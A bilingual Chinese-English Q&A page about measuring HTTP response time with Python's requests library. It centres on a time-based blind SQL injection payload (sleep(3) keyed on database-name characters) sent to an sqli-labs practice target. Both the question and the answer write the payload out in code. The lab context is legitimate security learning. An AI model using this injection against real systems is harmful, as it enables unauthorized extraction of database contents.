问题描述

我试图在Web应用程序的HTTP响应中引入人为延迟(这是一种用于盲目SQL注入的技术).如果以下HTTP请求是从浏览器发送的，则Web服务器的响应会在3秒后返回(由sleep(3)引起):

I am trying to induce an artificial delay in the HTTP response from a web application (This is a technique used to do blind SQL Injections). If the below HTTP request is sent from a browser, response from the web server comes back after 3 seconds(caused by sleep(3)):

http://192.168.2.15/sqli-labs/Less-9/?id=1'+and+if+(ascii(substr(database(),+1,+1))=115,sleep(3),null)+--+

我正在尝试使用请求库在Python 2.7中执行相同的操作.我的代码是:

I am trying to do the same in Python 2.7 using the requests library. The code I have is:

import requests

payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = r.elapsed.total_seconds()
print roundtrip

我希望往返时间为3秒，但我得到的值是0.001371、0.001616、0.002228等.我是否没有正确使用elapsed属性?

I expected the roundtrip to be 3 seconds, but instead I get values 0.001371, 0.001616, 0.002228, etc. Am I not using the elapsed attribute properly?

推荐答案

已用测量从发送请求到完成解析响应 headers 的时间，直到传输完整的响应为止.

elapsed measures the time between sending the request and finishing parsing the response headers, not until the full response has been transfered.

如果要测量时间，则需要自己测量:

If you want to measure that time, you need to measure it yourself:

import requests
import time

payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
start = time.time()
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = time.time() - start
print roundtrip

这篇关于使用Python中的请求库测量HTTP响应时间.我做对了吗?的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持！